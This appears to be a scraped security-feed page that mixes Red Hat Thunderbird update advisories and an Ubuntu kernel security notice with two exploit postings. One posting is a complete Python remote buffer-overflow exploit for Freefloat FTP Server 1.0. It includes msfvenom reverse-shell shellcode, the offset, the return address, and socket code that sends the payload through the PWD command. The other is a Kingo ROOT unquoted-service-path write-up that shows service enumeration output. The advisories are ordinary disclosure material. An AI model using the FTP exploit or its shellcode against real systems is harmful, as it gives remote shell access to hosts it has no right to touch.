2236079 - CVE-2023-4580 Mozilla: Push notifications saved to disk unencrypted  
2236080 - CVE-2023-4581 Mozilla: XLL file extensions were downloadable without warnings  
2236082 - CVE-2023-4583 Mozilla: Browsing Context potentially not cleared when closing Private Window  
2236084 - CVE-2023-4584 Mozilla: Memory safety bugs fixed in Firefox 117, Firefox ESR 102.15, Firefox ESR 115.2, Thunderbird 102.15, and Thunderbird 115.2  
2236086 - CVE-2023-4585 Mozilla: Memory safety bugs fixed in Firefox 117, Firefox ESR 115.2, and Thunderbird 115.2

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
thunderbird-102.15.0-1.el9_2.src.rpm

aarch64:  
thunderbird-102.15.0-1.el9_2.aarch64.rpm  
thunderbird-debuginfo-102.15.0-1.el9_2.aarch64.rpm  
thunderbird-debugsource-102.15.0-1.el9_2.aarch64.rpm

ppc64le:  
thunderbird-102.15.0-1.el9_2.ppc64le.rpm  
thunderbird-debuginfo-102.15.0-1.el9_2.ppc64le.rpm  
thunderbird-debugsource-102.15.0-1.el9_2.ppc64le.rpm

s390x:  
thunderbird-102.15.0-1.el9_2.s390x.rpm  
thunderbird-debuginfo-102.15.0-1.el9_2.s390x.rpm  
thunderbird-debugsource-102.15.0-1.el9_2.s390x.rpm

x86_64:  
thunderbird-102.15.0-1.el9_2.x86_64.rpm  
thunderbird-debuginfo-102.15.0-1.el9_2.x86_64.rpm  
thunderbird-debugsource-102.15.0-1.el9_2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-4051  
https://access.redhat.com/security/cve/CVE-2023-4053  
https://access.redhat.com/security/cve/CVE-2023-4573  
https://access.redhat.com/security/cve/CVE-2023-4574  
https://access.redhat.com/security/cve/CVE-2023-4575  
https://access.redhat.com/security/cve/CVE-2023-4577  
https://access.redhat.com/security/cve/CVE-2023-4578  
https://access.redhat.com/security/cve/CVE-2023-4580  
https://access.redhat.com/security/cve/CVE-2023-4581  
https://access.redhat.com/security/cve/CVE-2023-4583  
https://access.redhat.com/security/cve/CVE-2023-4584  
https://access.redhat.com/security/cve/CVE-2023-4585  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk9itbAAoJENzjgjWX9erEpP4P/33j6g2oK58st/oGwjZ2Nndy  
AJDc/GeHuHSmeIZXGo6FkLGlZpxS/x0tV4VRxEQcALxdQwhMWPevUv8Y3wg3Vwft  
OKOgKC7iXWsNY5ljQXBt+bjdFoJtYuIad2AJCNaYXMvthdgHhG6O77pY+H2qUH6z  
j2ej40Kwah5ZcxkGLP02yfyb+gA69uqBktkEKdY5ETDyM69LgtKkGIU1pr1CgF3f  
NqGo0JXRvvjcNbVbj+3HkVCQEfgAz9wiLVJ1lFSGGqwU1gCQaaE3xit4S1Mgcdhb  
Uz8H3o1ZXLY1L6rZYzSpDKHCHCWteIxDT+49KTkDGzs/MjGNzOXiqm8Xe+Kh/TVY  
ISJq0vZROI0j54IjJWdLvUlCflf0NGZjSoqQZTes5s1S+EbLM6sCi97Vibq8IaQ/  
xQ+iQ/rTnS/lVrGPSsNs3x/SeBRaIfPqVIzBGJfgvaawnrZABWsmlNSHeneuQPa8  
OknUlzhWlvL013jaqT6CtvuwShKRILxEya+urGIwWM17XDYrClqpydIxTeHGfyhy  
rKVPBjjdOX2LBVSanZOw7KmpGy0xbdrSXCT/WWy/F3jMrH0R9aXeYe1OTBi/m03s  
fn4rTx71LfQgPQslSfA8AsOFBdxhHEUxkLxz+XA2j7HX1TTTfPV1gQiA0BsKfCHg  
ZOhhy4otKX3VHoMel4V7  
=tYnO  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4955-01

Freefloat FTP Server version 1.0 suffers from a remote buffer overflow vulnerability.

    #Exploit title: Freefloat FTP Server 1.0 - 'PWD' Remote Buffer Overflow#Date: 08/22/2023#Exploit Author: Waqas Ahmed Faroouqi (ZEROXINN)#Vendor Homepage: http://www.freefoat.com#Version: 1.0#Tested on Windows XP SP3 #!/usr/bin/pythonimport socket#Metasploit Shellcode#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.146.134 LPORT=4444 -b '\x00\x0d' #nc -lvp 4444#Send exploit#offset = 247 #badchars=\x00\x0d\#return_address=\x3b\x69\x5a\x77 (ole32.dll)payload = ("\xb8\xf3\x93\x2e\x96\xdb\xca\xd9\x74\x24\xf4\x5b\x31\xc9""\xb1\x52\x31\x43\x12\x83\xeb\xfc\x03\xb0\x9d\xcc\x63\xca""\x4a\x92\x8c\x32\x8b\xf3\x05\xd7\xba\x33\x71\x9c\xed\x83""\xf1\xf0\x01\x6f\x57\xe0\x92\x1d\x70\x07\x12\xab\xa6\x26""\xa3\x80\x9b\x29\x27\xdb\xcf\x89\x16\x14\x02\xc8\x5f\x49""\xef\x98\x08\x05\x42\x0c\x3c\x53\x5f\xa7\x0e\x75\xe7\x54""\xc6\x74\xc6\xcb\x5c\x2f\xc8\xea\xb1\x5b\x41\xf4\xd6\x66""\x1b\x8f\x2d\x1c\x9a\x59\x7c\xdd\x31\xa4\xb0\x2c\x4b\xe1""\x77\xcf\x3e\x1b\x84\x72\x39\xd8\xf6\xa8\xcc\xfa\x51\x3a""\x76\x26\x63\xef\xe1\xad\x6f\x44\x65\xe9\x73\x5b\xaa\x82""\x88\xd0\x4d\x44\x19\xa2\x69\x40\x41\x70\x13\xd1\x2f\xd7""\x2c\x01\x90\x88\x88\x4a\x3d\xdc\xa0\x11\x2a\x11\x89\xa9""\xaa\x3d\x9a\xda\x98\xe2\x30\x74\x91\x6b\x9f\x83\xd6\x41""\x67\x1b\x29\x6a\x98\x32\xee\x3e\xc8\x2c\xc7\x3e\x83\xac""\xe8\xea\x04\xfc\x46\x45\xe5\xac\x26\x35\x8d\xa6\xa8\x6a""\xad\xc9\x62\x03\x44\x30\xe5\xec\x31\xa8\x73\x84\x43\xcc""\x6a\x09\xcd\x2a\xe6\xa1\x9b\xe5\x9f\x58\x86\x7d\x01\xa4""\x1c\xf8\x01\x2e\x93\xfd\xcc\xc7\xde\xed\xb9\x27\x95\x4f""\x6f\x37\x03\xe7\xf3\xaa\xc8\xf7\x7a\xd7\x46\xa0\x2b\x29""\x9f\x24\xc6\x10\x09\x5a\x1b\xc4\x72\xde\xc0\x35\x7c\xdf""\x85\x02\x5a\xcf\x53\x8a\xe6\xbb\x0b\xdd\xb0\x15\xea\xb7""\x72\xcf\xa4\x64\xdd\x87\x31\x47\xde\xd1\x3d\x82\xa8\x3d""\x8f\x7b\xed\x42\x20\xec\xf9\x3b\x5c\x8c\x06\x96\xe4\xac""\xe4\x32\x11\x45\xb1\xd7\x98\x08\x42\x02\xde\x34\xc1\xa6""\x9f\xc2\xd9\xc3\x9a\x8f\x5d\x38\xd7\x80\x0b\x3e\x44\xa0""\x19")shellcode = 'A' * 247 + "\x3b\x69\x5a\x77" + '\x90' * 10 + payloaddef main():    ip = '192.168.146.135'    port = 21    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)    sock.connect((ip, port))        sock.recv(1024)    sock.send('USER anonymous\r\n')    sock.recv(1024)    sock.send('PASS anonymous\r\n')    sock.recv(1024)    sock.send('pwd ' + shellcode + '\r\n')    sock.close()    if __name__ == '__main__':    main()

Freefloat FTP Server 1.0 Buffer Overflow

Red Hat Security Advisory 2023-4946-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 102.15.0.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2023:4946-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4946  
Issue date:        2023-09-04  
CVE Names:         CVE-2023-4051 CVE-2023-4053 CVE-2023-4573   
                   CVE-2023-4574 CVE-2023-4575 CVE-2023-4577   
                   CVE-2023-4578 CVE-2023-4580 CVE-2023-4581   
                   CVE-2023-4583 CVE-2023-4584 CVE-2023-4585   
=====================================================================

1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 8.2  
Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications  
Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP  
Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream AUS (v. 8.2) - x86_64  
Red Hat Enterprise Linux AppStream E4S (v. 8.2) - ppc64le, x86_64  
Red Hat Enterprise Linux AppStream TUS (v. 8.2) - x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 102.15.0.

Security Fix(es):

* Mozilla: Memory corruption in IPC CanvasTranslator (CVE-2023-4573)

* Mozilla: Memory corruption in IPC ColorPickerShownCallback  
(CVE-2023-4574)

* Mozilla: Memory corruption in IPC FilePickerShownCallback (CVE-2023-4575)

* Mozilla: Memory corruption in JIT UpdateRegExpStatics (CVE-2023-4577)

* Mozilla: Memory safety bugs fixed in Firefox 117, Firefox ESR 102.15,  
Firefox ESR 115.2, Thunderbird 102.15, and Thunderbird 115.2  
(CVE-2023-4584)

* Mozilla: Memory safety bugs fixed in Firefox 117, Firefox ESR 115.2, and  
Thunderbird 115.2 (CVE-2023-4585)

* Mozilla: Full screen notification obscured by file open dialog  
(CVE-2023-4051)

* Mozilla: Full screen notification obscured by external program  
(CVE-2023-4053)

* Mozilla: Error reporting methods in SpiderMonkey could have triggered an  
Out of Memory Exception (CVE-2023-4578)

* Mozilla: Push notifications saved to disk unencrypted (CVE-2023-4580)

* Mozilla: XLL file extensions were downloadable without warnings  
(CVE-2023-4581)

* Mozilla: Browsing Context potentially not cleared when closing Private  
Window (CVE-2023-4583)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2236071 - CVE-2023-4573 Mozilla: Memory corruption in IPC CanvasTranslator  
2236072 - CVE-2023-4574 Mozilla: Memory corruption in IPC ColorPickerShownCallback  
2236073 - CVE-2023-4575 Mozilla: Memory corruption in IPC FilePickerShownCallback  
2236075 - CVE-2023-4577 Mozilla: Memory corruption in JIT UpdateRegExpStatics  
2236076 - CVE-2023-4051 Mozilla: Full screen notification obscured by file open dialog  
2236077 - CVE-2023-4578 Mozilla: Error reporting methods in SpiderMonkey could have triggered an Out of Memory Exception  
2236078 - CVE-2023-4053 Mozilla: Full screen notification obscured by external program  
2236079 - CVE-2023-4580 Mozilla: Push notifications saved to disk unencrypted  
2236080 - CVE-2023-4581 Mozilla: XLL file extensions were downloadable without warnings  
2236082 - CVE-2023-4583 Mozilla: Browsing Context potentially not cleared when closing Private Window  
2236084 - CVE-2023-4584 Mozilla: Memory safety bugs fixed in Firefox 117, Firefox ESR 102.15, Firefox ESR 115.2, Thunderbird 102.15, and Thunderbird 115.2  
2236086 - CVE-2023-4585 Mozilla: Memory safety bugs fixed in Firefox 117, Firefox ESR 115.2, and Thunderbird 115.2

6. Package List:

Red Hat Enterprise Linux AppStream AUS (v. 8.2):

Source:  
thunderbird-102.15.0-1.el8_2.src.rpm

x86_64:  
thunderbird-102.15.0-1.el8_2.x86_64.rpm  
thunderbird-debuginfo-102.15.0-1.el8_2.x86_64.rpm  
thunderbird-debugsource-102.15.0-1.el8_2.x86_64.rpm

Red Hat Enterprise Linux AppStream E4S (v. 8.2):

Source:  
thunderbird-102.15.0-1.el8_2.src.rpm

ppc64le:  
thunderbird-102.15.0-1.el8_2.ppc64le.rpm  
thunderbird-debuginfo-102.15.0-1.el8_2.ppc64le.rpm  
thunderbird-debugsource-102.15.0-1.el8_2.ppc64le.rpm

x86_64:  
thunderbird-102.15.0-1.el8_2.x86_64.rpm  
thunderbird-debuginfo-102.15.0-1.el8_2.x86_64.rpm  
thunderbird-debugsource-102.15.0-1.el8_2.x86_64.rpm

Red Hat Enterprise Linux AppStream TUS (v. 8.2):

Source:  
thunderbird-102.15.0-1.el8_2.src.rpm

x86_64:  
thunderbird-102.15.0-1.el8_2.x86_64.rpm  
thunderbird-debuginfo-102.15.0-1.el8_2.x86_64.rpm  
thunderbird-debugsource-102.15.0-1.el8_2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-4051  
https://access.redhat.com/security/cve/CVE-2023-4053  
https://access.redhat.com/security/cve/CVE-2023-4573  
https://access.redhat.com/security/cve/CVE-2023-4574  
https://access.redhat.com/security/cve/CVE-2023-4575  
https://access.redhat.com/security/cve/CVE-2023-4577  
https://access.redhat.com/security/cve/CVE-2023-4578  
https://access.redhat.com/security/cve/CVE-2023-4580  
https://access.redhat.com/security/cve/CVE-2023-4581  
https://access.redhat.com/security/cve/CVE-2023-4583  
https://access.redhat.com/security/cve/CVE-2023-4584  
https://access.redhat.com/security/cve/CVE-2023-4585  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk9itZAAoJENzjgjWX9erEQrkP/iKzWe4qFGWp8qncyFNdVq66  
NL7aEVme8hVwzfY9Q/Bddw2R+VwRQbj4ON3z1j49wNG2qGg9wJijQRbov6WuGgP7  
lhtE/bD0bxoXhTASyVV38nvXXHntRVmDmphGsI64V3CeNPpQxT64y85nLPC9eVcb  
acCfW4HoetcQMKR04VQrdBKo7NaIkkeyKFKpIt0XCObLfoyjGAx8l8jBJQMop4OW  
8mOxwzLy+gLwTfexI1zHX6UtnkceH5QsrUabYCUpzFtQsZFPD1vaCTQp9s6G+GuL  
nOKVTlgzh211mSTh/VhwBrPDAQfbMNcWO52dBENBv/M1aC/rQluJ0xTnbvnVa2gi  
yhK8pNS0glfsETEqWAm2Def7UQC5DLtOHhvVEKBlqtQ28MPjw+BGCxyaGka0rlYk  
7NwiNpS+3z5nRBTS+vwIiuiTHUK8BVpvL6CJd2mxgcMxRxRH6DG9mTAhD3VbG5Gx  
Snv18wvTWlj02gaKBNJlV7QBN8m11tu9JQ32ViHMYTSY/dhCku8d5MDco24WQHyD  
OMG196KxXrG6XKmnMZVlss43Al5EVb709Re3UG2C0agMpc/XbMueRuPonP55BpwB  
edOjqbCbmhRURhKCXWCL9tBipVUZZHhyCLXvOq7zNmxuQlHuJPXT+3d2Uj4PI7ZQ  
KoRQ8hkP2/wQvHiCV31t  
=2uhL  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4946-01

Kingo ROOT version 1.5.8 suffers from an unquoted service path vulnerability.

    #Exploit Title: Kingo ROOT 1.5.8 - Unquoted Service Path#Date: 8/22/2023#Exploit Author: Anish Feroz (ZEROXINN)#Vendor Homepage: https://www.kingoapp.com/#Software Link: https://www.kingoapp.com/android-root/download.htm#Version: 1.5.8.3353#Tested on: Windows 10 Pro-------------Discovering Unquoted Path--------------C:\Users\Anish>sc qc KingoSoftService[SC] QueryServiceConfig SUCCESSSERVICE_NAME: KingoSoftService        TYPE               : 110  WIN32_OWN_PROCESS (interactive)        START_TYPE         : 2   AUTO_START        ERROR_CONTROL      : 1   NORMAL        BINARY_PATH_NAME   : C:\Users\Usman\AppData\Local\Kingosoft\Kingo Root\update_27205\bin\KingoSoftService.exe        LOAD_ORDER_GROUP   :        TAG                : 0        DISPLAY_NAME       : KingoSoftService        DEPENDENCIES       :        SERVICE_START_NAME : LocalSystemC:\Users\Anish>systeminfoHost Name:                 DESKTOP-UT7E7CFOS Name:                   Microsoft Windows 10 ProOS Version:                10.0.19045 N/A Build 19045

Kingo ROOT 1.5.8 Unquoted Service Path

Red Hat Security Advisory 2023-4956-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 102.15.0.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2023:4956-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4956  
Issue date:        2023-09-04  
CVE Names:         CVE-2023-4051 CVE-2023-4053 CVE-2023-4573   
                   CVE-2023-4574 CVE-2023-4575 CVE-2023-4577   
                   CVE-2023-4578 CVE-2023-4580 CVE-2023-4581   
                   CVE-2023-4583 CVE-2023-4584 CVE-2023-4585   
=====================================================================

1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 8.4  
Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4  
Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update  
Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream AUS (v.8.4) - x86_64  
Red Hat Enterprise Linux AppStream E4S (v.8.4) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream TUS (v.8.4) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 102.15.0.

Security Fix(es):

* Mozilla: Memory corruption in IPC CanvasTranslator (CVE-2023-4573)

* Mozilla: Memory corruption in IPC ColorPickerShownCallback  
(CVE-2023-4574)

* Mozilla: Memory corruption in IPC FilePickerShownCallback (CVE-2023-4575)

* Mozilla: Memory corruption in JIT UpdateRegExpStatics (CVE-2023-4577)

* Mozilla: Memory safety bugs fixed in Firefox 117, Firefox ESR 102.15,  
Firefox ESR 115.2, Thunderbird 102.15, and Thunderbird 115.2  
(CVE-2023-4584)

* Mozilla: Memory safety bugs fixed in Firefox 117, Firefox ESR 115.2, and  
Thunderbird 115.2 (CVE-2023-4585)

* Mozilla: Full screen notification obscured by file open dialog  
(CVE-2023-4051)

* Mozilla: Full screen notification obscured by external program  
(CVE-2023-4053)

* Mozilla: Error reporting methods in SpiderMonkey could have triggered an  
Out of Memory Exception (CVE-2023-4578)

* Mozilla: Push notifications saved to disk unencrypted (CVE-2023-4580)

* Mozilla: XLL file extensions were downloadable without warnings  
(CVE-2023-4581)

* Mozilla: Browsing Context potentially not cleared when closing Private  
Window (CVE-2023-4583)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2236071 - CVE-2023-4573 Mozilla: Memory corruption in IPC CanvasTranslator  
2236072 - CVE-2023-4574 Mozilla: Memory corruption in IPC ColorPickerShownCallback  
2236073 - CVE-2023-4575 Mozilla: Memory corruption in IPC FilePickerShownCallback  
2236075 - CVE-2023-4577 Mozilla: Memory corruption in JIT UpdateRegExpStatics  
2236076 - CVE-2023-4051 Mozilla: Full screen notification obscured by file open dialog  
2236077 - CVE-2023-4578 Mozilla: Error reporting methods in SpiderMonkey could have triggered an Out of Memory Exception  
2236078 - CVE-2023-4053 Mozilla: Full screen notification obscured by external program  
2236079 - CVE-2023-4580 Mozilla: Push notifications saved to disk unencrypted  
2236080 - CVE-2023-4581 Mozilla: XLL file extensions were downloadable without warnings  
2236082 - CVE-2023-4583 Mozilla: Browsing Context potentially not cleared when closing Private Window  
2236084 - CVE-2023-4584 Mozilla: Memory safety bugs fixed in Firefox 117, Firefox ESR 102.15, Firefox ESR 115.2, Thunderbird 102.15, and Thunderbird 115.2  
2236086 - CVE-2023-4585 Mozilla: Memory safety bugs fixed in Firefox 117, Firefox ESR 115.2, and Thunderbird 115.2

6. Package List:

Red Hat Enterprise Linux AppStream AUS (v.8.4):

Source:  
thunderbird-102.15.0-1.el8_4.src.rpm

x86_64:  
thunderbird-102.15.0-1.el8_4.x86_64.rpm  
thunderbird-debuginfo-102.15.0-1.el8_4.x86_64.rpm  
thunderbird-debugsource-102.15.0-1.el8_4.x86_64.rpm

Red Hat Enterprise Linux AppStream E4S (v.8.4):

Source:  
thunderbird-102.15.0-1.el8_4.src.rpm

aarch64:  
thunderbird-102.15.0-1.el8_4.aarch64.rpm  
thunderbird-debuginfo-102.15.0-1.el8_4.aarch64.rpm  
thunderbird-debugsource-102.15.0-1.el8_4.aarch64.rpm

ppc64le:  
thunderbird-102.15.0-1.el8_4.ppc64le.rpm  
thunderbird-debuginfo-102.15.0-1.el8_4.ppc64le.rpm  
thunderbird-debugsource-102.15.0-1.el8_4.ppc64le.rpm

s390x:  
thunderbird-102.15.0-1.el8_4.s390x.rpm  
thunderbird-debuginfo-102.15.0-1.el8_4.s390x.rpm  
thunderbird-debugsource-102.15.0-1.el8_4.s390x.rpm

x86_64:  
thunderbird-102.15.0-1.el8_4.x86_64.rpm  
thunderbird-debuginfo-102.15.0-1.el8_4.x86_64.rpm  
thunderbird-debugsource-102.15.0-1.el8_4.x86_64.rpm

Red Hat Enterprise Linux AppStream TUS (v.8.4):

Source:  
thunderbird-102.15.0-1.el8_4.src.rpm

aarch64:  
thunderbird-102.15.0-1.el8_4.aarch64.rpm  
thunderbird-debuginfo-102.15.0-1.el8_4.aarch64.rpm  
thunderbird-debugsource-102.15.0-1.el8_4.aarch64.rpm

ppc64le:  
thunderbird-102.15.0-1.el8_4.ppc64le.rpm  
thunderbird-debuginfo-102.15.0-1.el8_4.ppc64le.rpm  
thunderbird-debugsource-102.15.0-1.el8_4.ppc64le.rpm

s390x:  
thunderbird-102.15.0-1.el8_4.s390x.rpm  
thunderbird-debuginfo-102.15.0-1.el8_4.s390x.rpm  
thunderbird-debugsource-102.15.0-1.el8_4.s390x.rpm

x86_64:  
thunderbird-102.15.0-1.el8_4.x86_64.rpm  
thunderbird-debuginfo-102.15.0-1.el8_4.x86_64.rpm  
thunderbird-debugsource-102.15.0-1.el8_4.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-4051  
https://access.redhat.com/security/cve/CVE-2023-4053  
https://access.redhat.com/security/cve/CVE-2023-4573  
https://access.redhat.com/security/cve/CVE-2023-4574  
https://access.redhat.com/security/cve/CVE-2023-4575  
https://access.redhat.com/security/cve/CVE-2023-4577  
https://access.redhat.com/security/cve/CVE-2023-4578  
https://access.redhat.com/security/cve/CVE-2023-4580  
https://access.redhat.com/security/cve/CVE-2023-4581  
https://access.redhat.com/security/cve/CVE-2023-4583  
https://access.redhat.com/security/cve/CVE-2023-4584  
https://access.redhat.com/security/cve/CVE-2023-4585  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk9itMAAoJENzjgjWX9erEYD0P/33Pwxlg+FpKuv9QorsSObyq  
9oeXNJkM2snoG0o76zPwtVPPxgu9uxwvgeHV9yf3Z5eecO68OzxmDefdiNkLdHEr  
DQ9P/swHvJZyZjqXsgphv8B6o4fRyaYh5+ULNRt/8uifrvPMR3WJr4xuuXSxjGkI  
K6PNPgxglQfmcTlPsW/Uc0jfly6FyRYOssV8NlDFvIyR+ZvSUptIZDQq2jhqdXGc  
Kv7K8BsdoaCoTSO25p9KJgM3SAr+rZuz2/jQ/CFv5Me4UMhEQSa55s/LSr43cN8a  
9I+xjuK0/eBnYM5A3k5XfO6ueLmd3v0ecLYx6xUViwY07aoiudhYU1Zk794gpjFt  
JdyqU9x5wY9UKF5Svz4xb1mNitgLNfLL6qgf4B9l8FfQmJY8dP5S9F89ltS8Scwb  
rPMyTAn4rDmQ87BU2AA9cvps1hXcPyTWmnO3VH8kion4BbiLKCZuwN5fb0v0sbb/  
4RYi13u0RHJ3jE/uYGCUcw/a6tJ0sKbNHWnTWMfkYZI5Is85OmEYqjNHmQogtUfZ  
drbGqn8DOdIZE7qaypY39PO1U4RIRLNt6LSp5ctr/Gk0nHe62JlPOKZiEtX7YOOh  
LLp55Hrf6uJgiipALL+AnBXjpLPaz8JQ/rWeRWkOZBXTJedDy6lfIWXBQMtxTgqR  
TLWzlOlvAbfLvv6QVLWy  
=vY67  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4956-01

Ubuntu Security Notice 6337-1 - It was discovered that the netlink implementation in the Linux kernel did not properly validate policies when parsing attributes in some situations. An attacker could use this to cause a denial of service. Billy Jheng Bing Jhong discovered that the CIFS network file system implementation in the Linux kernel did not properly validate arguments to ioctl in some situations. A local attacker could possibly use this to cause a denial of service.

==========================================================================  
Ubuntu Security Notice USN-6337-1  
September 04, 2023

linux-azure-5.4 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 18.04 LTS (Available with Ubuntu Pro)

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-azure-5.4: Linux kernel for Microsoft Azure cloud systems

Details:

It was discovered that the netlink implementation in the Linux kernel did  
not properly validate policies when parsing attributes in some situations.  
An attacker could use this to cause a denial of service (infinite  
recursion). (CVE-2020-36691)

Billy Jheng Bing Jhong discovered that the CIFS network file system  
implementation in the Linux kernel did not properly validate arguments to  
ioctl() in some situations. A local attacker could possibly use this to  
cause a denial of service (system crash). (CVE-2022-0168)

It was discovered that the ext4 file system implementation in the Linux  
kernel contained a use-after-free vulnerability. An attacker could use this  
to construct a malicious ext4 file system image that, when mounted, could  
cause a denial of service (system crash). (CVE-2022-1184)

It was discovered that some AMD x86-64 processors with SMT enabled could  
speculatively execute instructions using a return address from a sibling  
thread. A local attacker could possibly use this to expose sensitive  
information. (CVE-2022-27672)

William Zhao discovered that the Traffic Control (TC) subsystem in the  
Linux kernel did not properly handle network packet retransmission in  
certain situations. A local attacker could use this to cause a denial of  
service (kernel deadlock). (CVE-2022-4269)

It was discovered that a race condition existed in the qdisc implementation  
in the Linux kernel, leading to a use-after-free vulnerability. A local  
attacker could use this to cause a denial of service (system crash) or  
possibly execute arbitrary code. (CVE-2023-0590)

It was discovered that a race condition existed in the btrfs file system  
implementation in the Linux kernel, leading to a use-after-free  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or possibly expose sensitive information. (CVE-2023-1611)

It was discovered that the APM X-Gene SoC hardware monitoring driver in the  
Linux kernel contained a race condition, leading to a use-after-free  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or expose sensitive information (kernel memory).  
(CVE-2023-1855)

It was discovered that the ST NCI NFC driver did not properly handle device  
removal events. A physically proximate attacker could use this to cause a  
denial of service (system crash). (CVE-2023-1990)

It was discovered that the XFS file system implementation in the Linux  
kernel did not properly perform metadata validation when mounting certain  
images. An attacker could use this to specially craft a file system image  
that, when mounted, could cause a denial of service (system crash).  
(CVE-2023-2124)

It was discovered that the SLIMpro I2C device driver in the Linux kernel  
did not properly validate user-supplied data in some situations, leading to  
an out-of-bounds write vulnerability. A privileged attacker could use this  
to cause a denial of service (system crash) or possibly execute arbitrary  
code. (CVE-2023-2194)

It was discovered that a race condition existed in the TLS subsystem in the  
Linux kernel, leading to a use-after-free or a null pointer dereference  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or possibly execute arbitrary code. (CVE-2023-28466)

It was discovered that the DA9150 charger driver in the Linux kernel did  
not properly handle device removal, leading to a user-after free  
vulnerability. A physically proximate attacker could use this to cause a  
denial of service (system crash) or possibly execute arbitrary code.  
(CVE-2023-30772)

It was discovered that the btrfs file system implementation in the Linux  
kernel did not properly handle error conditions in some situations, leading  
to a use-after-free vulnerability. A local attacker could possibly use this  
to cause a denial of service (system crash). (CVE-2023-3111)

It was discovered that the Ricoh R5C592 MemoryStick card reader driver in  
the Linux kernel contained a race condition during module unload, leading  
to a use-after-free vulnerability. A local attacker could use this to cause  
a denial of service (system crash) or possibly execute arbitrary code.  
(CVE-2023-3141)

It was discovered that the Qualcomm EMAC ethernet driver in the Linux  
kernel did not properly handle device removal, leading to a user-after free  
vulnerability. A physically proximate attacker could use this to cause a  
denial of service (system crash) or possibly execute arbitrary code.  
(CVE-2023-33203)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
   linux-image-5.4.0-1113-azure    5.4.0-1113.119~18.04.1  
   linux-image-azure               5.4.0.1113.86

After a standard system update you need to reboot your computer to make  
all the necessary changes.

